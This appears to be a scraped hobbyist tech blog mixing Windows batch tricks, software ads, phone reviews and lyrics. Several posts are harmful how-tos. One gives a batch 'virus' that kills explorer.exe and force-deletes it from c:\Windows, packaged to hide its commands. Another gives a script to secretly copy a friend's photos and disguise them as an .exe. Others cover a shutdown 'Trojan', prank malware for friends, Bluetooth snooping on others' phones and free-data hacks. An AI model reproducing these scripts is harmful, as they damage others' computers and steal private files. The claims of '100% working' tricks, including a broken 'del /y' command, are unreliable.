0

Delete undeletable Files

I like to spend my month end to sort, clean and arrange the data in my PC. Most of the times I delete more than 2 GB files in one go. I always like to delete unused and unwanted files from my PC as my 320 GB hard disk is not enough for me. And most of the times when I try to delete items from the C drive, I can’t delete some.

Some days before, i got a new trick to delete undeletable files and is 100% working in all Operating Systems.

Follow the steps to delete undeletable files.

1) Open command prompt and leave it open.

2) Open Task Manager and kill the process 'explorer.exe' from the process tab

3) Leave the Task Manager open.

4) In the command prompt window, type 'del /y ' and hit enter.

5) Go back to Task Manager, click File, New Task and enter explorer.exe to start the GUI shell.

Now you can see that the undeletable file is deleted. There are many ways to delete undeletable files, and I suggest this because, it’s the easiest method to do it. Some undeletable files can’t be deleted by this method. I will share a few tricks to delete that types of files, in my coming chapters.

Feel free to comment this post.

1

Most simple & dangerous virus, I have ever created.


 As we all know, explorer.exe is an essential application that comes with our OS and is very necessary one. Without that application a normal user can’t do anything with his/her computer. With this concept, I just created a virus that damages the whole Operating System (OS) itself. That virus just deletes the application explorer.exe in c:\windows. But its not possible to delete the explorer.exe as the process ecplorer.exe is running in the computer. So, first we have to kill that process before deleting that application. Killing of that process can be done with the help of an application called pskill.exe which is available in the internet within the package PStools.  As usual open notepad to type the commands.
So, to kill the process explorer.exe, our first command should be this.
pskill.exe explorer.exe
Next thing we want to do is to delete the explorer.exe. As the explorer.exe is in c:\windows, the second command should be this.
del /f /q c:\Windows\explorer.exe
del is the command to delete, /f is to delete by forcing and /q is to execute the command in quite mode, and c:\Windows\explorer.exe is the file to delete. Now save the file as anything.bat. The application pskill.exe should be in the same folder as the .bat file is.
That’s all you want to do. Now the virus is ready to damage any windows PC. You can convert this application to .exe file so that no one will see the commands we typed. Don’t forget to pack the pskill.exe with the .bat file.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.

Feel free to comment this post.

0

Application to steal pictures from the ‘My Pictures’ folder.


 Our friends as well as our relatives will not allow us to copy their pictures in their computer. So, if we want their pictures, stealing is the only way to get that files. I have an application, that I created by myself to steal pictures from the ‘My Pictures’ folder. It’s just easy and amazing. You can also create that application by yourselves as these types of applications are not available on the internet. The only software you want to create this application is 7z.exe. If our friend/relative will see his/her pictures in our Pendrive, that we have stolen, he/she may scold us and may delete it too. So we want to hide that stolen pictures in our Pendrive.  First we want to make a folder in the Pendrive to copy all the pictures from the ‘My Pictures’ folder. S the command should be this:
md temp
Where md is the command to make directory. After the execution of this command, a new folder named ‘temp’ will be created. Now, we want to copy the pictures from the folder ‘my pictures’ to the folder temp. So the next command should be this.
copy "c:\users\%username%\pictures" %CD%\temp
where the copy is the command to copy files, %CD% denotes the Current Directory, %username% is a variable for the username, and ‘c:\users\%username%\pictures’ is the path to the my pictures. After the execution of the previous command, all the pictures in the folder ‘My Pictures’ will be copies to the folder ‘temp’. Now we have to hide all the pictures. We can just hide all the pictures by zipping all that files into an anything.exe file. Zipping can be done with the help of the application 7z.exe. So the next command should be this.
7z.exe a sha.exe %CD%\temp
Where a is the command to add files to the archive. Now the files are zipped into a file named sha.exe. Now we want to delete the files in the folder ‘temp’ that we have copied earlier. So the net command should be this.
del /q %CD%temp\*.*
Where del is the delete command and /q is for quite mode, and *.* denote all the files.
Now save the file as anything.bat. Now it’s ready to use. By running that anything.bat in the Pendrive, you will get a file named sha.exe. The only thing you want to do to get files inside sha.exe is to extract that file (sha.exe). Its just a small application,  but also an amazing one. Its 100% working because, I created it and was successful.


NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.



Feel free to comment this post.

1

Eject all the drives with one click.

Normally we eject our CDs by pushing the eject button in our CD/DVD drive.
Its a little tough to eject all the drives if we have more than one drives.
I have a program that ejects all the drives in one click.
It help the user to eject all the possible CD/DVD drives with in one click.
After Opening user will be given some time to put the CD/DVD disk into the tray.
That application will un-ejects the drives also.
You can get that application from here.
Feel free to comment.

0

Forget about your keyboard.

Windows operating system comes with an inbuilt virtual keyboard also known as 'On Screen Keyboard'.
Most of the windows users dont know about that application.
Its a very useful and funny inbuilt application in windows.
I have just created an application to start that 'On Screen Keyboard'.
You can download it here.
Just run it and forget about your keyboard.

0

Start Sound recorder with a single click

Sound recorder is an useful application in windows OS.
But its little hard to find that application.
I like to record sounds with that default application by windows.
As its difficult to find, I have created a small application that starts the default Sound recorder in Windows.
You can download it here.

Feel free to comment.

0

Restart eplorer.exe with Explorer Restart

We all know that our Operating System jams mainly because our explorer.exe crashes.
Just restarting the explorer.exe will help you to escape from that trouble.
Normally, we end the process explorer.exe from the task manager> processes.
But it needed little bit time to end and start explorer.exe in that way.
With that concept of restarting explorer.exe, i have created an application that restarts the explorer.exe within seconds...
I think , this application will be helpful to you too...
Fell free to comment this post and application.
You can download it here...

0

Print Current Sceen with Screen Shooter

Most of you may not be aware of the use of 'PrintScreen' button in our keyboard.
On clicking that button, the current screen that we see in our monitor will be copied to the clipboard.
And we can paste it in any image editor to get an output in any image format.
But it will take minutes.
I have created a new application to take the screen shot of the current screen.
Advantage of this application is that, there is no need to paste the image from the clipboard to any image editors to get an image file.
The program itself will create a png image of the current screen.
It's installation is silent.
You can take ScreenShots by just typing 'ss' without quotes in the run command.
You can download this application from here.

Feel free to comment this post and application.

1

Kill the current .bat execution with CMD Killer.

As you all may know that, a batch file is a text file containing a series of commands intended to be executed by the command interpreter.
Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.
DOS batch files have the filename extension .bat.

On clicking the batch file, the commands saved in the batch file will be executed, and sometimes the commands saved in the batch file will be dangerous.
There are batch commands to format all drives in PCs.
If we click on that type of files, its necessary to stop the execution of that batch file.
I have created a small application to stop the execution of the current running batch file.
As this application kills the CMD, I named this application as "CMD Killer".
I made it because, its a very useful application to me, because most of the times i work with batch files.
I think this application will be useful to you too.
You can download this small application from here.

Feel free to comment about this post and application.

0

Multiple Google Talk with one click.

Hai friends....

In my previous post i have shared you a trick to take Multiple Google talk. But i got some comments that , it was little bit difficult to do that.
So friends, now I have a new trick to do the same.
First you download this small application from here.
Then copy that application to the folder 'Windows' in the C drive.
Thats all you want to do.
Now you can take google talk by run command.
Just click windows+R to take run dialog box.
Then type 'gt' without quotes. and hit enter.



Note: Google Talk should be installed in your PC before trying this trick.

0

Bom Sabado! Orkut is now under attack with a new spam-virus! Please stay away....

Today I recieved many scraps from my friends saying that "Bom Sabado!". I just called my friends and asked what it is...
They dont know anything anything., then i started googling to get the details of that scrap.
Finally I found that its a new virus-spam in orkut. Its a worm stealing Orkut and Google accounts’ cookies and automatically posting scraps. It also automatically makes you join some communities.

Here are some few tips to escape from this hacking:

1) If you get that scrap from your friends, please dont visit your friend's profile. It may stole your cookies your account will be used to post scraps.

2) If you have visited any of your friend's infected profile and now your profile is also get infected, then first check if you have been joined some communities automatically, if yes,and remove them. Then close Orkut. immediately. Then change your Google account’s password, security question, secondary email and mobile number. This will prevent you from the hacking.


3)Clear your cookies/cache, then you will get an ‘Automated Query’ message. Don’t hustle about that.

4)Just logout from your account, if you cant logout. Click here.

5)Just forget about Orkut, until this problem is solved. I will try to update this post when the issue is resolved.


Stay Away.... Be Safe....!!!

0

A trick to make fun with your friend.


All of us like to make fun with our friends, as i do.
I like to make small viruses and give to my friends. Most of the viruses i made is tested in my friends computers'.
I am thankful to my friends for this.  Last weak i was searching for the command to eject CD drive and to turn off the monitor.
At the end of my 1 day searching, i got both the codes. Immediately i made a product with that codes.
And that application will turn the monitor off and eject the CD drives simultaneously.
You can download the file from here and give to your friend and have a fun.
You can change its icon with the help of the software called 'Icon changer'.

1

Kaspersky PURE-Ultimate Protection for Your Digital Life...

Kaspersky PURE far exceeds regular PC protection. It renders your PC highly immune to cyber threats of any kind. You can trust Kaspersky PURE to protect the integrity and privacy of all your digital assets. Kaspersky PURE keeps your computer in pristine condition and gives you complete peace of mind.

See the features  of  Kaspersky PURE:
  • Fights digital pollution
    Kaspersky PURE keeps malicious content and spam at bay, whilst letting you manage access to your applications, email and the Internet. Additional security tools erase any data-trail, so hackers can’t follow.
  • Protects digital assets
    Kaspersky PURE prevents your photos, music, documents, videos, etc. from becoming lost, stolen or corrupted. Advanced backup tools and the latest encryption technology mean that you decide who you share your personal data with.
  • Safeguards digital identities
    Kaspersky PURE has everything you need to protect your digital identity. With a built-in virtual keyboard, the latest in anti-phishing technology and a secure password management system, it won’t let you down!
    Ensures family-safe content Kaspersky PURE puts you in charge of who uses the PC’s on your home network and what they can see and do, both online and off. Detailed reporting systems keep you fully informed and your family safe.
  • Centralizes security management
    Kaspersky PURE allows you to check your network’s security status, automatically download and roll out updates from a nominated PC, log events and organize scans and backups from any point on the home network.
  • Provides all-round protection
    Kaspersky PURE is the one-stop-shop for home network protection. It contains everything that you need to manage your network’s security and to keep it malware-free, without the need to be an IT expert.
 See and download it from here...

0

Kaspersky Anti-Virus 2011 released.....

Essential PC Protection

Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning technologies work silently in the background while you enjoy your digital life.

Kaspersky Internet Security continues to provide users with a high level of protection that includes security tools not offered by many competitors. The 2011 version won't change the face of personal computer security, although this particular package of security options and top-shelf performance has attracted enough devotees to make it a best-selling program, both in and out of the security field. A three-user license for Kaspersky Internet Security 2011 retails for $79.99. 


Features and Support:
There are several new and notable features in Kaspersky Internet Security 2011, including improvements to the sandboxing tool introduced last year called Safe Run. The updates to Safe Run allow the feature to be used on the desktop itself, protecting users systemwide. The in-app access to Safe Run includes a folder that bottlenecks files created during Safe Run, allowing them to be saved to the unsandboxed desktop but scanning them for threats before allowing them to move freely about your system.
Kaspersky is clearly proud of the product, promoting it to a more prominent spot in the navigation, and it works better than it did last year. Transitioning between sandboxed and unsandboxed states is smooth. It's been designed to resemble the Windows default remote access tool, so getting around in the feature presents a nearly flat learning curve.
The new SafeSurf option is derived in part from Safe Run. It launches Web sites in a safe environment, scanning them before they fully resolve on your computer for familiar threats. This is useful for preventing legitimate sites that have been infected from infecting you. This works parallel to the phishing-prevention feature, which takes a more aggressive stance in this year's version by looking for URL features that can often indicate a phishing attempt. The attempt won't occur in a vacuum, though, because Kaspersky will ping its home base so that the company's researchers can further analyze the threat.

Kaspersky Internet Security combines the essential security of our advanced Anti-Virus software with additional layers of defense, such as firewall and parental controls. Innovative technologies deliver real-time protection, monitor suspicious activity, and block dangerous actions before they can cause harm - all while working silently in the background.
Features include: Up-to-the-second Internet threat protection. Safe Desktop for opening suspicious programs without risk to your PC. Enhanced parental controls to limit or log activities and communications.

What's new in this version:
  • Installation on infected PC with auto-download of Support's AVP Tool
  • Installation CD can be used as a bootable Rescue Disk--Retail customers don't need to manually create a Rescue Disk, it comes ready to use out of the box.
  • Desktop Security Gadget--For quick access to your protection status and settings.
  • System Watcher-- for proactive defense against emerging threats.
  • Proactive protection against phishing
  • Safe Desktop and Safe Run for Websites...


Download it here...

0

Kaspersky Rescue Disk 10

Kaspersky Rescue Disk 10 is designed to scan and disinfect x86 and x64-compatible computers that have been infected. The application should be used when the infection is so severe that it is impossible to disinfect the computer using anti-virus applications or malware removal utilities (such as Kaspersky Virus Removal Tool) running under the operating system.
In this case, disinfection is more efficient because malware programs do not gain control when the operating system is being loaded. In the emergency repair mode, you can only start objects scan tasks, update databases roll back updates and view statistics.
Kaspersky Rescue Disk 10 allows performing the following actions:
  • Configure objects scan settings:
    • change security level
    • change actions to be performed on detected objects
    • create a scan scope
    • change types of objects to be scanned
    • limit scan time
    • configure scan of compound files
    • change a scan method
    • set default settings
  • Configure databases update settings:
    • select an update source
    • specify proxy-server settings
    • specify regional settings
    • roll back to previous databases
  • Configure additional settings:
    • select detection of specific threat types
    • create a trusted zone
    • configure notifications settings
    • specify time of storing reports
    • specify time of storing Quarantine and Backup objects

You can download Kaspersky Rescue Disk 10 here...

0

Create virus yourself.

Making viruses by our-self may be our dream.
Here I have a trick to make a small non-infectious Trojan.
This Trojan is also created as a batch file as i have mentioned earlier in my previous post "Working with batch files".
To make this little Trojan, do the following steps:
1)Open notepad.
2)Type this without quotes: "C:\Windows\RUNDLL32.EXE user,exitwindows
exit "
3)Save this file with the extension ".bat".
4)Now, you are done...

Dont use this file to make any damage to others. Take it as just a fun.

0

Good news for all mobile phone lovers...

We all like to buy a good business phone with cheap rate. isnt it...?
Nokia is going to release a new phone named Nokia C3 for all the nokia mobile phone lovers. This phone is a business phone .
Nokia C3 comes with a qwerty keyboard which helps the user to chat easily and gives a business phone style.
It ows a 2.4" screen, 55MB inbuilt memory, Wi-Fi, bluetooth 2.1 and a micro usb.
This phone supports most of the audio formats like MP4/H.264/H.263/WMV, MP3/WAV/WMA/eAAC+
This offers a Micro SD memory card slot, hot swappable, up to 8 GB, 2 megapixel camera (1600 x 1200 pixels), Still image formats: JPEG, Zoom up to 4x (digital)
But this phone is a S40 phone.
Nokia C3 Support for download and streaming.
It gives a Stand-by Up to 800 hours and a talk time Up to 7 hours.
Nokia C3 brings you closer to your friends and online communities with easy messaging features and a fast, reliable internet connection.

0

Free internet browsing in Nokia Phones...

All of us like to be with the internet, all time. But most of us limit the usage of the internet, because of the browsing charges.
When i searched for 'Free GPRS hacks' in the internet, i came across a jar application.
It was an edited opera. I just downloaded it and checked it in my S40 mobile (Nokia 6085).
It was a successful one.
By this opera, you can browse any website from your mobile, freely.
But, damn, we cant download anything with this browser.


You can download that opera fro here.

3

Waka Waka... This time for Shakira.

As this is the time of world cup 2010, most of us will be in front of Tv to see the play.
The Fifa 2010 theme song, Waka Waka has catchee the minds of the football lovers.
By that song, the singer Shakira became famous in the media. I think, 'Waka waka' is the word most googled in the internet.

Lets know some about that singer shakira.

Shakira Isabel Mebarak Ripoll known professionally as Shakira is a Colombian singer, songwriter, musician, record producer, dancer, and philanthropist who emerged as a musical prodigy  in the music scene of Latin America in the early 1990s. Born and raised in Barranquilla, Colombia, Shakira revealed many of her talents in school as a live performer, demonstrating her vocal ability with rock and roll, Latin and Middle Eastern influences with her own original twist on belly dancing. Shakira is a native Spanish speaker and also speaks fluent English and Portuguese.
She has won two Grammy Awards,  seven Latin Grammy Awards,  twelve Billboard Latin Music Awards and has been Golden Globe-nominated.  She is also the highest-selling Colombian artist of all time, and the second most successful female Latin singer having sold over 50 million albums worldwide. Additionally, she is the only artist from South America to reach the number-one spot on the U.S. Billboard Hot 100, the Australian ARIA  chart, and the UK Singles Chart.  Shakira is to be given a star on the Hollywood Walk of Fame.



You can download thet song Waka waka from here.

Lets go through its lyrics also......

You're a good soldier
Choosing your battles
Pick yourself up
And dust yourself off
And back in the saddle

You're on the front-line
Everyone's watching
You know it's serious
We're getting closer 
This isn't over

The pressure is on
You feel it
But you've got it all
Believe it

When you fall get up
Oh oh...
And if you fall get up
eh oh...

Tsamina mina
Zangalewa
Cuz this is Africa

Tsamina mina eh eh
Waka Waka eh eh

Tsamina mina zangalewa
This time for Africa

Listen to your god

This is our motto
Your time to shine
Dont wait in line
Y vamos por Todo

People are raising
Their Expectations
Go on and feed them
This is your moment
No hesitations

Today's your day
I feel it
You paved the way
Believe it

If you get down
Get up Oh oh...
When you get down
Get up eh eh...

Tsamina mina zangalewa
Anawa aa
This time for Africa

Tsamina mina eh eh
Waka Waka eh eh

Tsamina mina zangalewa
Anawa aa

Tsamina mina eh eh
Waka Waka eh eh
Tsamina mina zangalewa
This time for Africa

0

KD Player

KD Player is a free skinnable Java ME-based media player created by Russian developer Knyzhov Dmitry. It is designed for mobile phones running Operating System Embedded platforms. The program can play back audio files that are supported by the phone model, most commonly MP3, wma and wav audio files. KD Player can be downloaded depending on the screen display that a mobile phone would support. The current screen displays available are 128×160, 176×220, 208×208 and 240×320 for different screen displays.

History

KD Player (Knyzhov Dmitry Player) was developed with the idea of an option for mobile phone users to replace the standard audio player with a sufficient and customizable player as translated from the author's description. The earliest version, 0.56, was released in the earliest of 2007 just as a small project to demonstrate the use of basic audio and video playback within the boundaries of Java ME. The author saw the need to further develop the application as the demand for a choice alternative media player grew from online mobile phone forum members.

Functionality

Playback options are as what can be found on any media player and are play, fast forward, rewind, shuffle and repeat in which playlist repeat and single track repeat are supported. The applications also hosts its own volume control which is separate to the volume of the mobile phone device it is running on. KD Player supports full reading of ID3-tag data (v1 & v2) in common mp3 files. The user can specify which folders to scan on either the mobile phone's in built memory or inserted memory card of the mbile phone. KD player stores the scanned folders in a music library from which the user can further read and create playlists and similarly create bookmarks to audio files. The application can use the number keys on a phone for operation in playback and menu selection, such as 5 for play/pause/select in menu and 6 for fast forward/next track/go right in menu in menu with all other number keys with a use. KD Player can be comparable to the Walkman software player found on specific Sony Ericsson mobile's, however unlike the Walkman player the user must manually update the music library by the selecting the feature 'update library' whenever music is added or removed from the mobile phone. For the updating of the library to work the user must first select all necessary folders where desired and supported audio file formats are located.
Scanning of subfolders can be enabled and disabled in the 'preferences' option. In some models particularly Sony Ericsson JP-7 and later based phones, the player can be minimized and left working in the background. KD Player also supports the reading and display of album art as one of its primary features. An image file supported by KD Player (jpg, png, bmp) has got to be already made available in the folder of corresponding audio files which will serve as the album art image that is displayed. The reading and displaying of embedded metadata album art is also supported.
The creation and management of playlists is supported.

Translations

KD Player supports UTF-8 text encoding and has been translated into several languages including the foremost English by the contribution of its users.

Customability

One of the most sought after features of KD Player is the ability to custom change the theme design by the use of designed skins created by users to enhance the player's visual look. Skins for KD Player have shown that the album art can be made bigger depending on the skin's layout. Skin's created are screen display dependent. The entire skin consists of a kdi and a kds in order for the skin to be used. The '.kdi' is a simple image file (typically a .png file) with all the necessary image elements for the skin. The '.kds' is text file that contains markup code which controls all the image layouts of the kdi in addition to font sizing with RGB colour.
Skins made for KD Player are known to have conflicting support issues with Nokia phones although this has not been clearly explained. It had been speculated that skins using any form of transparency will fail to load on a Nokia phone. On KD Player's official website, skins that will support Nokia phones have "Nokia: Yes" under the preview.
The skins are available to download for free on KD Player's website as contributed by its users. A full tutorial for creating skins, that is written in Russian, is available on the website also.

Requirements

KD Player requires the presence of JSR-75 also known as File Connection API as well as the JSR 135 or the Mobile Media API (MMAPI) on phone devices in order to both search for files able and playback audio files. To utilize the player efficiently, the user must fully enable file access rights that KD Player will request when any attempting to play or search for files. The prompts for file access can simply be disabled on most phones for example, selecting 'Never Ask' for the application permissions on a Sony Ericsson K810.
Since version 0.95 the inclusion of an equalizer has been made as to being a much requested feature from its users. The equalizer is only accessible on certain phones with newer compatible Java ME platforms (JP-8).

0

Bluetooth hacker.

All of us like to see the files on our friend's mobile phone.
but most of our friends will not allow us to do so.
here is an application thats helps you to see the files on your friends mobile phone.
All you want is a bluetooth connection...

Medieval softaware is an mobile application that helps the user to browse, explore and manage files of any Bluetooth ready device.
Download, upload, explore, search, edit, create, delete and rename files and folders on your phone, PDA, palm, notebook, PC, photo viewer, music player and so on; using an easy, fast and intuitive user-interface (GUI). Transfer or delete many files and entire folders at once, with a single keypress, using the multiple selection feature. Search files across filesystems, using rapid and customisable parameters. Explore hidden files, or make your personal data private and/or read-only, using the attributes editor (local filesystem only). Cut, copy and paste files and folder across filesystems.

Main features:
    * Works on almost all phone models with MIDP 2.0 and CLDC 1.1 support, using a single JAR file;
    * Easy to use, fast and straightforward user-interface (GUI), powered by Medieval GUI system;
    * Complete touch-screen support with built-in "double click" event implemented;
    * Shortcut keys improves user usability and speed-up your GUI experience;
    * You can create, extract and manage ZIP / TAR / GZ / JAR / THM / NTH / UTZ files easily (local filesystem only);
    * Unique fullscreen mode (press [0] key), to remove top/bottom bars and enlarge working area;
    * Cool and intuitive menu system (press [7] or [MENU] key) to execute extended functionality;
    * Multiple files and folders selection (press [#] or [*] key), to transfer/delete many items at once;
    * Select all, Select none and invert selection options available;
    * Search files rapidly and accurately, on both local and Bluetooth filesystems, using customisable parameters;
    * Navigate on both local and Bluetooth filesystem using a single keypress (press [5] or [FIRE] key);
    * Download/upload items from/to any device with OBEX FTP support (almost on all phone models);
    * You can also send files using OBEX OPP profile (available on all phone models with Bluetooth);
    * Ability to cut/copy and paste files between devices and/or to manage local filesystem;
    * Edit file or folder attributes to enable or disable READ, WRITE and HIDDEN status flags;
    * Open/view the content of some files using the internal viewer (both local and Bluetooth filesystems);
    * Powerful internal image viewer with zoom in & zoom out features using a fast and smooth scale filter;
    * You can open text, image, audio and video files with the internal viewer;
    * Get files and folders informations on both local and Bluetooth devices;
    * Create new folders on both local and Bluetooth filesystem;
    * Rename items or get volume informations (local filesystem only);
    * You can add or remove a memory storage, without closing the program;
    * Search for any nearby Bluetooth device and read its informations;
    * Bookmark list allows you to save your favorite device without searching it again;
    * Very long file and folder names are scrolled on the screen using marquee technique;
    * Integrated help system that shows the "A-B-C" of this product;
    * Built-in error system with detailed explanation message;
    * Signed with both VeriSign and Thawte certificates;
    * Multi-language user interface.


click here to download the full version 
click here to download the lite version 




Try this application and enjoy...

0

5 things that i should remember, when i start a blog...

1) Blog's name: Your blogs name should be attractive and easy to remember. So that the visitors have no need to note your blogs name anywhere.

2) Blog's theme: As the name of your blog, your blog theme should also be attractive. Try to use light themes, so that the visitors can load your blog very easily.

3) Blog's Gadgets: There are lot of gadgets in the blogspot that can be applied to our blog. but don't try to apply the whole to your blog, the loading time of your blog will increase, if you do so.
try to add a blog search gadget to your blog, so that the visitor can find your articles very easily...

4) Blog's Content: The contents of your blog should be true and attractive. If any of your post is bad, you better try to avoid that post from your blog.
Try to write articles by yourself, don't copy the whole contents from other posts.

5)Comments: Always allow the visitors to leave a comment there, whatever the comment may be.
Try to solve the problem or clear the doubts of visitors in that very day itself.

0

Mobile phone software hanged........?

Hanging of mobile phone softwares is a normal case. These may be because of the huge cotent loaded in the phone or may be due to viruses or threads.
Even phones of more than 256mb may stuck. This may be because of the overloaded running applications. Most of the people restart the phone by re-putting the battery in this case.
But this method is not good for the phone. The best thing is to wait for the phone to respond, but this will take a long time. There is an easy way to solve this problem.
Just call the hanged phone from any other phone. Then the problem will be solved.
Just try this trick...

0

STEREO 3W AMPLIFIER MODULE

This Kit contains the essential components to build a low
voltage, high power stereo 3W amplifier module using the
Rohm 12V Dual Power Amplifier, BA5406. Not included are
speakers or speaker cables. This is not only to save weight
in the Kit but also because such items are often a matter of
personal preference by the user. Some users may choose to
spend money to buy the top quality speaker cables,
connectors and speakers. While others may have all these
items already in their junk box
The kit is constructed on single-sided printed circuit
boards. Protel Autotrax & Schematic were used.


Construction.
Add the lowest height components to the board first - the
resistors. Be careful to get the electrolytic capacitors in the
correct way around. The positive lead is marked on the
overlay. The negative lead is marked on the body of each
capacitor. The four MPE (metallized polyester) capacitors
can go in either way around. You can use your own
heatsink if less than 8 oC/W. Never operate the amplifier
without a heatsink attached.
The following items have to be supplied by you:
·  suitable 3, 4 or 8 ohm speakers
·  suitable cables
Solder the power & audio cables direct to the pads
provided on the PCB.



Operation.
The BA5406 contains two sets of AF power amplifiers. It
delivers 5W x 2 into 3 ohm loads with a 12V supply. It has
minimal power-on pop noise and has immunity to supply
voltage drop. It also has minimal RF radiation.
Recommended supply voltage: 5-15V max. Typical 12V.
Ideally the power supply should be able to deliver over
2.5Amps. This means that a typical ‘cheap’ plugin power supply (wall wart) will not be good enough. The power
supply leads should be as short as possible. Quiescent
current 20-70mA, typically 40mA.





COMPONENTS
Resistors 1/2W or 1W carbon film, 5%:
2R2 red red gold R3 R4 ...........2
120R brown red brown R1 R2 ..........2
Capacitors:
0.22uF, 224 MPE C1 C2 C11 C12............. 4
47uF/16V ecap C3 C4 C5 C6 C7 C8.............. 6
470uF/16V ecap C9 C10 ...........2
Heatsink HS-210 ...............1
12mm screw & nut................. 2sets
BA5406 IC ................1
K90 PCB .................1



0

The Nokia 7070 Prism is a flip phone that is rather affordable and presentable.

The Nokia 7070 Prism is a flip phone that is rather affordable and presentable. It is available at the price of $80.
The Nokia 7070 Prism comes in a flip design. It is rather smart and nice with its individual style. The color scheme provides a black casing with a pink or blue incrustation. When you open the phone, it shows a keyboard with diamond cut shaped keys on it. The Prism’s keypad is tactile and easy to dial and type. We have not had the errors while inputting text and dialing numbers. The display of the Nokia 7070 Prism provides a 1.8-inch TFT screen that supports 65K hues, the screen resolution makes up 128 x 160 pixels. The display shows bright and natural colors, its graphics is sharp and vibrant. The size of Nokia 7070 Prism compiles 87.5mm x 44mm x 15.8mm. The phone is lightweight and compact, it provides a comfortable feel when you hold the phone in your hand. The Prism easily fits into the pocket.
There are a number of other features in the Nokia 7070 Prism. They include Currency Converter 11, Dictionary, To Do List, calculator, alarm, voice recorder, speaker phone, phone book for 1,000 contacts and so on.
The messaging service of the Nokia 7070 Prism is quite usual including text messaging (SMS), multi-media messaging (MMS) and messaging though e-mail. There is an opportunity of audio messaging.
What concerns the Internet connection, the 7070 Prism has a WAP 2.0 web browser with XHTML. The built EDGE of the Prism technology gives you an opportunity to transfer the data quickly via the GPRS technology. The phone has a Dual-band network.
The Prism offers Java MIDP 2.0 games for entertainment. The battery life of the phone makes up 5 hours of talk time and 20 days of stand-by time.
The Nokia 7070 Prism is a standard cell phone with a standard set of features that comes at an affordable price.

0

What is safe mode?

What is safe mode?
Safe mode is a troubleshooting option for Windows that starts your computer in a limited state.
Only the basic files and drivers necessary to run Windows are started.
The words Safe Mode appear in the corners of your monitor to identify which Windows mode you're using.
If an existing problem doesn't reappear when you start in safe mode,
you can eliminate the default settings and basic device drivers as possible causes.
If you don't know the cause of the problem,
you can use the process of elimination to help you find the problem.
Try starting all of the programs you commonly use, including the programs in your Startup folder,
one by one to see if a program might be the cause of the problem.
If your computer automatically starts in safe mode without prompting,
 a problem with your computer might be preventing Windows from starting normally.
If you think the cause of the problem might be a recently installed program or device,
try using Recovery in Control Panel.

0

Why should I create themes?



The market for mobile content is expanding rapidly as consumers seek more personalisation options for their mobile devices. Themes enable users to publicly declare their passions: The possibilities — such as displaying a beautiful image or showing support for a favourite sports team — are bounded only by the imagination.

For businesses, themes offer opportunities for promotion and building brand awareness. A theme can be used to create a fully branded user experience, in which corporate identity permeates all aspects of a consumer's mobile phone use.

It's easy to start creating themes. Theme creation requires very little new learning — a person who already creates digital content probably has the right skills to create impressive graphics and audio for themes. Best of all, both versions of the Carbide.ui tool, which are used to create theme packages, are available free of charge.

0

Kaspersky Mobile Security Enterprise Edition

Kaspersky Mobile Security Enterprise Edition


Kaspersky Mobile Security Enterprise Edition is a powerful and reliable solution for protecting corporate mobile users from malicious programs, SMS spam and Internet attacks that target mobile platforms. It also provides protection for confidential data stored on a smartphone should the device be lost or stolen.

Why is it necessary to protect corporate smartphones? Mission-critical business data can be damaged or stolen by malware written especially for smartphones. A smartphone can fall victim to Internet attacks when downloading information from the Internet. Infected mobile devices can be used to penetrate the network perimeter of a corporate IT system. The loss or theft of a smartphone means that sensitive corporate information is in the hands of a stranger. In addition, SMS spam causes much inconvenience.

Kaspersky Mobile Security Enterprise Edition 7.0 is designed to help companies mitigate those risks. It combines Kaspersky Lab’s latest technologies for mobile platforms with extensive experience in combating malware, hacker attacks and spam. The solution provides comprehensive protection for corporate smartphones and the data stored on them. Kaspersky Mobile Security Enterprise Edition integrates closely with Kaspersky Administration Kit, giving the system administrator centralized control over high-level protection on any network node, be it a file server, workstation or mobile device.
Easy to deploy

Kaspersky Mobile Security Enterprise Edition can be installed from one point by a single system administrator regardless of the number of mobile device users in an organization, and even if those users are located in branch offices or abroad on business trips. Installation can be performed in two ways: via a PC using Microsoft ActiveSync or Nokia PC Suite, or via SMS by sending a link to the package and the configuration from the Administration Console using GSM Modem.
Flexible administration

In the event of a virus epidemic or simply the threat of a virus infection, the system administrator can change the mobile device security parameters for all users, or for a specific group. Some or all changes made to the settings by users can be blocked and the system administrator’s settings enforced in a security policy.
Complete control

Whether the user is in the office or overseas, you always have full control over their mobile device’s security. When a device has Internet access, it automatically establishes a connection with the server, receives updates and applies any new policies enforced by the system administrator.

The system administrator can receive information about any mobile device at any time. This includes the date of the most recent connection to Kaspersky Administration Kit, the status of antivirus and anti-spam protection, as well as reports from the Anti-Theft and Firewall modules.

Functions

Anti-Theft protection. To protect corporate data stored on a smartphone if it is lost or stolen, a user or system administrator can block the smartphone or delete files, messages, and the list of contacts remotely. The user can also find out who the “new owner” of the lost device is.

    * SMS Block. If a smartphone is lost, the user can send a “hidden SMS message” to the original SIM card. Access to the smartphone will be blocked until a pre-set password is entered.
    * SMS Clean. This function is similar to the SMS Block feature, but instead of blocking the smartphone it cleans the device’s memory.
    * SIM Watch. If a smartphone is stolen, the “new owner” will most likely immediately replace the original SIM card. The SIM Watch function will prevent the “new owner” from accessing any personal data without the initial SIM card inserted in the device. If the initial SIM card is replaced with a new one, the SMS Watch function will send the original user the new telephone number of the device without the “new owner’s” knowledge.

Antivirus protection. Kaspersky Mobile Security provides real-time anti-malware scanning of all incoming files and connections to keep you free of malicious programs. The system administrator can pre-set the best time for antivirus scanning and it will be performed automatically. If an infected object is detected and cannot be disinfected, it is stored in the quarantine folder or deleted.

Firewall. The system administrator can select one of the integrated IP firewall protection levels. Depending on the level selected, one or more restrictions will be applied to provide user security.

Anti-Spam for SMS. Telephone numbers of known spam sources, sender names, unwanted words or phrases can be added to a blacklist to ensure that such messages are always blocked. The user can also add addresses from the contact list to a whitelist.

Automatic updates. Antivirus databases are updated automatically at intervals set by the system administrator. Updates are available via WAP/HTTP (GPRS, EDGE, Wi-Fi, etc.) or via a PC.
Clich here to Download that...

0

Extract & Zip more...

Extract & Zip more...

